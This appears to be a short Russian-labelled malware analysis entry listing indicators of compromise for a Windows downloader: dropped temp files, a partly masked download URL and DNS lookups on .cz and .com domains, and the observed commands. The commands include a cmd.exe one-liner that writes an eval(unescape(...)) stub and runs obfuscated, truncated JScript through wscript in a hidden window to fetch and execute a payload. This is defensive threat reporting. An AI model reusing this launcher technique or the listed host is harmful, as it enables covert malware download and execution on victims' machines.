Техническая информация
- '%TEMP%\tmp683982.784'
- tmp683982.784
- %TEMP%\76782785.txt
- %TEMP%\tmp683982.784
- %TEMP%\silvan.cab
- %TEMP%\fluttering.dll
- %TEMP%\nsw9fa9.tmp\system.dll
- http://www.ne####enadhanou.cz/nvdtime.prs
- DNS ASK ho##or.com
- DNS ASK ne####enadhanou.cz
- ClassName: '' WindowName: ''
- '<SYSTEM32>\wscript.exe' /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbnFOhL%3D%20%2878717%2C%22Wr%22+%22ite%22%29%3BtfPmgkg%3D%20%2873498%2C%22GE%22+%22T%22%29%3BITPF%3D%20%2869054%2C%22Ex%22+%22ec%22%29%3Bf...
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbnFOhL%3D%20%2878717%2C%22Wr%22+%22ite%22%29%3B...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BbnFOhL%3D%20%2878717%2C%22Wr%22+%22ite%22%29%3B...
- '<SYSTEM32>\timeout.exe' 3